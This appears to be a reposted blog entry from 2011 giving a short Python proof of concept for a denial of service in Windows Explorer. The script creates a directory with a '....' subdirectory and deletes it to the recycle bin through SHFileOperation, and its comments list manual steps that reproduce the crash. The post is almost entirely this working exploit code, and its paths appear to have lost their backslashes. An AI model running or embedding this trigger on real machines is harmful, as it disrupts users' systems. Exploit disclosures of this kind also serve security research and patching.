Windows Explorer Denial Of Service

try:
    mkdir("c:trigger_alt")
except:
    print "[!] Trigger Directory Exists"
try:
    mkdir("c:trigger_alt....")
except:
    print "[!] Trigger Sub Directory Exists"

print "[!] Triggering Issue"

# This moves the directory containing the sub directory which creates the condition.
# The issue is in the function that moves the files to the recycle bin
# Replicate this using the following
# 1- mkdir c:trigger_alt
# 2- cd c:trigger_alt
# 3- mkdir ....
# 4- My Computer -> c:trigger_alt
# 5- Right Click -> Delete

shell.SHFileOperation((0,shellcon.FO_DELETE,'c:trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION))

 

本文固定链接: https://www.unhonker.com/bug/420.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2011年12月25日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Windows Explorer Denial Of Service | 90' s Blog|关注网络信息安全

Windows Explorer Denial Of Service:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!